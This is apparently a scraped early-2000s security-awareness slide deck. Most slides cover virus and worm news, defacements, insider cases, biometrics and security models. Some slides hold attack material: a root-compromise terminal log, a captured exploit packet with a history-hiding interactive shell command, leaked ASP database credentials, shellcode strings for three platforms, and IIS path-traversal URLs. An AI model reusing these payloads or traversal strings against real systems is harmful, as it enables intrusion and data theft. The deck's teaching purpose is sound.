war - My FIT
advertisement
_____ $_ final target compromised ___ #> rlogin -l root tgtsunprod2 Last login: Tue Jul 3 14:52:41 from tgtsunprod1 Sun Microsystems Inc. SunOS 5.8 Generic February 2000 ***** Warning Government Classified Server *** You have mail. tgtsunprod2 #/usr/sbin/ifconfig -au lo0: flags=1000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4> mtu 8232 index 1 inet 127.0.0.1 netmask ff000000 qfe0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2 inet 172.16.22.7 netmask ffffff00 broadcast 172.16.21.255 ether 8:0:20:f7:d0:78 dhsunprod2 #uname -a SunOS tgtsunprod2 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-80 tgtsunprod2 #id uid=0(root) gid=1(other) ___ Who am I? The Threat is Active • The blackhat community is extremely active. – 20+ unique scans a day. – 100% - 900% increase of activity from 2000 to 2001 – Its only getting worse Don't Underestimate Cyberterrorists Information Security is Important … …because we have so many friends …because we have so many friends …because we have so many friends …because we have so many friends …because we have so many friends The Attack 68.168.1.15:52312 -> 127.0.0.1:443 ...........N..zCyhy...i..B...y...c....t...D.1..9P`.8../9.................hjE.H.o.,B...."Oo...:.....'...i..%._~...Z...RqAJX...p3.....p5o.j.../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA..G @AAAA............AAAAAAAA....................................1... .w..w..O.O.....1.....Q1..f......Y1.9.u.f..Xf9F.t.....1...1..?I..A ..1...Q[....1.Ph//shh/bin..PS....... [..] 68.168.1.15:52312 -> 127.0.0.1:443 export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null; export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i. Doom on You…. <SCRIPT LANGUAGE="VBScript" RUNAT="Server"> Sub Application_OnStart Set Db = Server.CreateObject("Commerce.DbServer") Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c" Db.Application = "http://10.1.1.16/" Set Application("Db") = Db End Sub Sub Session_OnStart '==Visual InterDev Generated - DataConnection startspan== '--Project Data Connection Session("DataConn_ConnectionString") = "DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25; FIL=MS Access;MaxBufferSize=512;PageTimeout=5;" Session("DataConn_ConnectionTimeout") = 15 Session("DataConn_CommandTimeout") = 30 Session("DataConn_RuntimeUserName") = "" Session("DataConn_RuntimePassword") = "" '==Visual InterDev Generated - DataConnection endspan== End Sub </SCRIPT> User ID: sa Password: n0t4u2c Trojan Horse Sept 26, 2001 • Crackers posted a Trojan Horse masquerading as a wu-ftpd exploit on the Vuln-Dev mailing list. • If the code is compiled and run, it will delete most files on the host’s hard drive XSS Filter-Bypass Manipulation •This technique is used pass various types of client-side scripting language through implemented security filters. •The idea is to be able to achieve client-side execution of a clientside script. •There are several techniques used to perform this attack. E-mail Virus Oct 2001 • BP Openworld’s billing department has been sending out the BadTrans virus with its responses to recent e-mail inquiries – The virus launches a Trojan horse in infected machines – BP Openworld is a subsidiary of British Telecommunications offering internet services for business and home use Format String Vulnerabilities Any call that passes user-supplied input directly to a *printf()-family function is dangerous. These calls can Also be identified by their argument deficiency. Consider this code: printf(“%s“, userdata); printf(userdata); Argument deficiency Fingerprint Recognition: Sensors (I) Optical fingerprint sensor [Fingerprint Identification Unit FIU-001/500 by Sony] Electro-optical sensor [DELSY® CMOS sensor modul] Capacitive sensor [FingerTIP™ by Infineon] Physical Access Controls • • • • • • Network Segregation Perimeter Security Security Guards Badge Systems Biometric Access Controls Closed Circuit TV Monitoring • Sensors & Alarms World Trade Center Virus • The destructive TROJ_VOTE.A e-mail virus exploits the WTC tragedy – It attacks the infected users address book to spread and send a message about peace between America and Islam – It also installs two VBS files which attempt to delete the windows directory on reboot The Threat from the Insider NIMDA Worm • The NIMDA worm raced around the world in only 30 minutes when it is was first released in Sept 2001 • Some AV experts recommended disconnecting from the Internet until patches and upgrades could be put into effect. Iris Recognition System for passive iris recognition by Sensar Wireless Attacks • Wireless hacking is an increasing threat to wired networks – Attackers can penetrate, monitor, and manipulate data on traditional wired networks by accessing the system through its wireless sub-network. – The attacker can intercede between two wired hosts behind a firewall, between a wired host and a wireless host, or between two wireless clients – Uses a “man-in-the-middle” Address Resolution Protocol (ARP) cache poisoning attack. Attack the Architecture html handler shtml handler Web Server cgi handler jsp handler text/html header html shtml include file text/html header Process SSI tags #include #exec text/html sh, header perl,… /bin/sh cgi Process Java JSP tags Compiler jsp Java Runtime default handler class script/ execu-table SirCam Worm • SirCam surfaced in mid-July 2001 – Scoops up documents in an infected PC and mails them to people in the user’s address book – The most damaging aspect is its ability to enlist dormant viruses in the users’ files and mail them to others – Result: viruses that might not have spread very far alone get wider distribution and older viruses will get new life – By Aug 2001, SirCam had infected over 100,000 computers in the US Viruses – File (Parasitic) Viruses • Simple File Viruses – After transplanting itself in the executable, the executable often doesn’t work • Stealth Component – Work very similar to stealth system sector viruses • Mask the file size of infected files when a directory listing is done on them CyberTerrorism – Oct 2001 • The Pakastani hacker group G-Force defaced a US government web site and threatened to turn over “some very high confidential US data” to Al Queada officials if the war on terrorism continues • This comes days after a government warning of sophisticated and sustained cyberattacks launched by pro-Muslim hacker groups such as G-Force, Doktor Nuker, and the Pakistan Hackerz Club Redesi Worm – Oct 2001 • An e-mail attachment purporting to be a Microsoft software security patch is actually a worm – It spreads through e-mail – On Nov 11 the worm will reform the c: drive of infected machines Discretionary Access Control List (DACL) • The DACL controls who can access the object and how. permissions for only one user or one group at a time the object's Access Control Settings Credit Card Stealing Trojan • Reported on Oct 29,2001 - Septer – Preying on sympathies for terrorist attack victims, a credit card stealing trojan horse masquerading as an appeal for donations from the American Red Cross is making the rounds via e-mail – Users click on the executable attachment and a donation request form loads. If completed, credit card numbers and contact information are saved and uploaded to a Web site. NT Rootkit • Rootkit console with Keyboard sniffing Former Employee Attack • Wendy Sholds allegedly broke into her former boss’s computer – She forwarded confidential e-mail to other employees – She used the boss’s username and password to view private information on the company web site Security Models • Security Models – Bell-LaPadula – Biba – Chinese Walls – Clark-Wilson Hacker Alliance • Three pro-Islamic hacker groups have joined forces to carry out attacks – Each group is carrying out digital attacks under a common banner – They are anti-Israel, anti-US/UK, anti-India IIS Double Hex Round 1 Decoding: scripts/..%255c../winnt becomes: scripts/..%5c../winnt (%25 = “%” Character) Round 2 Decoding: scripts/..%5c../winnt becomes: scripts/..\../winnt Directory path traversal is now possible using path obfuscation through Double Hex Encoding. USA Today Site Hacked • The “USA Today” website was defaced with six bogus stories • The site was taken offline for three hours Security Testing • Software will never be placed or deployed into a trusted or predictable environment • Security testing requires attacking the software in a way that exercises the trust relationships. • The software should be tested in ways that are unexpected while observing for behaviors that are unknown. Student Data Exposed • The permission level to access web logs at Resicom, a telecommunications company that provides intra-campus phone services to colleges was set too low – It allowed people to search for student names, social security numbers and addresses Microsoft Misrepresented Security • A Federal Trade Commission (FTC) investigation found that Microsoft misrepresented both the level of security provided and the amount of data collected by its Passport services – Microsoft agreed to refrain from making false claims about the information it collects and will submit to an independent audit of its security program every two years. Programming Satan’s Computer Cell Phone Virus • A worm-type virus called Timofonica, hit customers of Spain’s Movistar service – It sends text messages scrolling across the screens of cellular phones – It is the first virus known to target cell pones – We can now expect copycat viruses targeting cell phone and other hand-held devices such as Palm Pilots and Pocket PC computers Microsoft Breakin • A hacker broke into BetaPlace.com, Microsoft's web site for beta testers – evidently someone's log-in credentials were leaked to the Internet. – Microsoft shut down the site after it became aware of the breach; it also reset user passwords. – The site contains unreleased versions of Windows, other software and activation keys. – A spokesman said the intruder did not access source code. The event has sparked a criminal investigation. HTTP 1.1 Methods The Method token indicates the method to be performed on the resource identified by the Request-URI. Buffer Overflows • Overwrite return address – Examples of shell-code strings: LINUX on Intel: char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; SPARC Solaris: char shellcode[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xdc\xda\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08"; Windows: char shellcode[] = "\x55\x8B\xEC\x33\xFF\x57\xC6\x45\xFC\x63\xC6\x45“ “\xFD\x6D\xC6\x45\xFE\x64\x57\xC6\x45\xF8\x03" "\x80\x6D\xF8\x50" "\x8D\x45\xFC\x50\x90\xB8" "EXEC" "\xFF\xD0\x33\xC0\x50\x90” “\xB8" "EXIT" "\xFF\xD0\xC3"; Different Threat Scenarios 1. Regular biometric sensor using artificially generated biometric data 2. Replay attack of eavesdropped biometric data 3. Manipulation of stored biometric reference data SNMP Management Normal CAM Behavior III MAC Port A 1 B 2 C 3 AB Port 1 MAC A MAC B I see do Not see traffic to B! B is on Port 2 MAC C Double Encapsulated 802.1q VLAN Hopping Attack Note: Only works if trunk has the same native VLAN as the attacker Strip off First, and Send Back out • • • • Send double encapsulated 802.1Q frames Switch performs only one level of decapsulation Unidirectional traffic only Works even if trunk ports are set to off Hacking Cisco Cisco Bugtraq Vulnerabilities • • • • • 1998 1999 2000 2001 2002 (est) - 3 5 23 46 94 Typical Web Application Set-Up HTTP request (cleartext or SSL) Web Client SQL Database Firewall Web app Web Server Web app Web app DB DB Web app HTTP reply (HTML, Javascript, VBscript, etc) •Apache •IIS •Netscape etc… Plugins: •Perl •C/C++ •JSP, etc Database connection: •ADO, •ODBC, etc. Traditional Hacking • Requires specialized coding skills such as writing shell-code for buffer-overflows, etc. • In short, it is a complex activity with a limited practitioner base. ... winsock_found: xor push inc push inc push call cmp jnz push push call jmp socket_ok: mov mov mov ... eax, eax eax eax eax eax eax socket eax, -1 socket_ok sockerrl offset sockerr write_console quit2 sock, eax sin.sin_family, 2 esi, offset _port NT IIS Showcode ASP Vulnerability • Active Server Page (ASP) script installed by default on Microsoft's Internet Information Server (IIS) 4.0 • Gives remote users access to view any file on the same volume as the web server that is readable by the web server. http://www.someserver.com/msadc/Samples/SELECTOR/Showcode asp?source=/msadc/Samples/../../../../../boot.ini The MDAC Attack Client Internet Explorer or VB.exe Server HTML IIS ASP Server (ADO) OBDC Provider OBDC Remote Data Service RDS Data Control URL RDS OLE Data Factory DB Jet Provider RDS Data Space Custom Business Objects Jet 3.5 Missile of Death Web app Web Server Web app Web app Web app DB DB An Example: Brute Forcing Session ID’s in URLS AUTOMATED DEMO! $8.8 Billion Mistake by Microsoft • According to Computer Economics, the worldwide economic impact of the Love Bug Virus was estimated at $8.75 billion • The fact that Microsoft Outlook was designed to execute programs that were mailed to it made the virus possible..
